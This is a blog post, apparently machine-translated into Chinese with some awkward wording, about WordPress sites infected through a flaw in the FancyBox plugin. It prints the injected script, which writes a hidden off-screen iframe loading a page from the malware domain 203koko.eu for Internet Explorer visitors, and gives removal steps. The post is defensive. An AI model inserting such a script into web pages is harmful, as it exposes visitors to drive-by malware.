[惡意軟件 iframe 203koko] 網站 WordPress 受感染的惡意軟件

本週早些時候一些網站和博客 WordPress,收到來自的警告 惡意軟件感染 通過 谷歌的管理者.

問題向其中 谷歌的管理者 稱為是一個存在 鱈魚 / 腳本 iframe惡意軟件 來源網站。

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

看來,這是一個 漏洞 a 插入acquis FancyBox 為 WordPress 它直到昨天(05.02.2015)尚未更新,很長一段時間。
解決這個問題,並 消毒病毒網站 有了這個惡意軟件,相對簡單。
1.禁用FancyBox插件。
2。 從服務器上刪除所有的FancyBox插件文件(通過FTP)
3.安裝新版本的插件(的fancybox 3.0.4)

FancyBox 為 WordPress 3.0.4

- 重命名受 3.0.3 中提到的安全問題影響的設置。 這應該可以阻止惡意代碼出現在插件所在的網站上 updated 不刪除惡意代碼。

FancyBox 為 WordPress 3.0.3

-  修正了一個安全問題.

惡意軟件信息: 

TYPE:Iframe的重定向
TARGET: WordPress 花式盒子
惡意軟件DOMAIN:203koko.eu
惡意軟件網址:http://203koko.eu/hjnfh/ipframe2.php
惡意軟件 RAW 代碼:
惡意軟件寫道: if (navigator.userAgent.match(/msie/i)) { document.write(‘

刪除您的惡意軟件 WordPress 網站.

創始人兼編輯 Stealth Settings,從 2006 年至今。 操作系統方面的經驗 Linux (特別是 CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (內容管理系統)。

如何 » 谷歌 » [惡意軟件 iframe 203koko] 網站 WordPress 受感染的惡意軟件
發表評論